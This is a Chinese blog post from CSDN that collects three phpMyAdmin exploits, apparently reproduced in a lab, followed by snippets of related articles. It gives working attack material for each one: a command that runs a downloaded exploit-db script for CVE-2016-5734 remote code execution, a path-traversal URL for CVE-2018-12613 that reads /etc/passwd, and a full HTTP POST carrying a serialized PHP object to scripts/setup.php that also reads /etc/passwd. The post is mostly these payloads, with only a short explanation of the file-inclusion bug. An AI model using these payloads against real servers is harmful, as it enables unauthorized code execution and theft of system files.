phpmyadmin漏洞合集

最新推荐文章于 2024-08-03 14:23:09 发布
最新推荐文章于 2024-08-03 14:23:09 发布
阅读量593 收藏
点赞数 1
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131500400
版权

1.PhpMyAdmin 4.0.x—4.6.2 远程代码执行 (CVE-2016-5734)
        操作技巧:
            去https://www.exploit-db.com/exploits/40185下载一个exp文件
            执行python3 phpmyadmin.py -c 'system(id);' -u root -p root -d test http://192.168.68.129:8080
        漏洞原理:
        漏洞版本:
            4.0.x version before 4.0.10.16
            4.4.x version before 4.4.15.7
            4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)
    2.phpmyadmin远程文件包含漏洞(CVE-2018-12613)
        操作技巧:
            payload:http://192.168.68.129:8080/?target=db_datadict.php?/../../../../../../../../etc/passwd
        漏洞原理:
            在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,
            假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的
            参数,同时代码会对?后面的参数进行排除,所以构造出恶意代码target=db_datadict.php?/../../,还有一个原因就是,a?/../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,
            但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;综上所有原因,导致了该漏洞的出现。
        漏洞版本:phpMyAdmin 4.8.0和4.8.1
    3.Phpmyadmin Scripts/setup.php反序列化漏洞 (WooYun-2016-199433)
        操作技巧:
            POST /scripts/setup.php HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Cookie: phpMyAdmin=pZb3cMlU0GbpnfHX0mRA4mbWlRd
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 80

            action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
        漏洞原理:
        漏洞版本:2.x

!QK
关注
PhpMyAdmin远程执行代码漏洞复现 (CVE-2016-5734)
千寻的博客
03-21 1543
phpMyAdmin`中存在安全漏洞,该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。
PhpMyAdmin漏洞介绍
weixin_45253622的博客
03-19 3420
获取网站绝对路径,
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9766
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 6019
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1994
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpMyAdmin 漏洞
weixin_69065643的博客
08-03 370
判断在www在Extensions同级。修改日志文件状态和日志文件保存路径,在sql语句执行界面执行命令。访问shell,使用工具连接。
phpMyAdmin漏洞利用与安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
phpMyAdmin 漏洞小集合
SoulCat
08-07 5648
phpMyAdmin 4.0.x—4.6.2 远程代码执行漏洞(CVE-2016-5734)+4.8.1 远程文件包含漏洞(CVE-2018-12613) 有情有义又是无米之炊,无情无义却是饕餮盛宴. 远程代码执行漏洞(CVE-2016-5734) phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修...
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 627
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现
君莫hacker的博客
09-12 732
0x01 漏洞介绍 漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本
phpMyAdmin 漏洞利用
lendq的Blog
02-08 2490
国内 很多 网址 都 喜欢 使用phpMyAdmin来 管理 MySQL数据库 而且多数 可以 通过phpMyAdmin 完全操控Mysql数据库。 phpMyAdmin功能常强大 可以执行 操作系统 命令,导入或者导出数据库 一般会存在Root密码过于简单,代码泄露``Mysql配置等漏洞 通过一些技术手段 ,多数能获取网站webshell,甚至是服务器权限。 phpMyAd...
[Vulhub](WooYun-2016-199433)phpmyadmin反序列化漏洞
qq_50854662的博客
10-30 359
0x00 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化 序
phpmyadmin 4.8.1远程文件包含漏洞 CVE-2018-12613 漏洞复现
ADummy的博客
02-26 300
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613) by ADummy 0x00利用路线 ​ 首先要能登录数据库,然后测试文件包含 0x01漏洞介绍 这里需要满足如下5个条件便可以执行包含文件代码include $_REQUEST['target']; 1.$_REQUEST['target']不为空 2.$_REQUEST['target']是字符串 3.$_REQUEST['target']开头不是index 4.$_REQUEST['target']不在$target
PhpMyAdmin漏洞利用汇总
xuu4561的博客
10-04 1078
PhpMyAdmin漏洞利用汇总 目录 0x01 信息收集 1.1 版本信息获取 1.2 绝对路径获取 0x02 PhpMyAdmin利用 2.1 写入文件GetShell 2.2 User defined funct ion(UDF): 2.3 MOF提权: 0x03 PhpMyAdmin漏洞利用 3.1 WooYun-2016-199433:任意文件读取漏洞 3.2 CVE-2014 -8959:本地文件包含 3.3 CVE-2016-5734 :后台命令执行RCE 3.4 CVE-20
phpmyadmin-文件包含漏洞代码审计过程(超详细)
qq_59020256的博客
01-26 1400
phpmyadmin-文件包含漏洞
phpMyAdmin 4.7.x CSRF 漏洞利用
weixin_40581617的博客
06-13 727
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。在线 phpMyAdmin CSRF 演练地址:https://www.vul...
常见cms漏洞PhPMyadmin
最新发布
ineedmoreMuQ的博客
08-03 304
安装后直接访问即可密码为mysql的密码,在小皮中即可查看。
CVE-2018-12613 phpadmin文件包含漏洞
鱼开yk2的博客
10-15 956
网址: https://www.phpmyadmin.net/security/PMASA-2018-4/ 摘要 文件包含和远程执行代码攻击 描述 发现了一个漏洞,攻击者可以在该漏洞中包含(查看并可能执行)服务器上的文件。 该漏洞来自代码的一部分,其中页面在phpMyAdmin中重定向和加载,以及对白名单页面的不正确测试。 除以下情况外,必须对攻击者进行身份验证: $ cfg [‘Allow...
phpmyadmin漏洞
07-27
回答: phpMyadmin漏洞是指在phpMyadmin程序中存在的文件包含漏洞。该漏洞允许攻击者通过构造恶意的文件路径来读取、执行或者包含任意文件。这个漏洞对于大部分版本的phpMyadmin都生效,因此使用该系统的用户需要格外...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值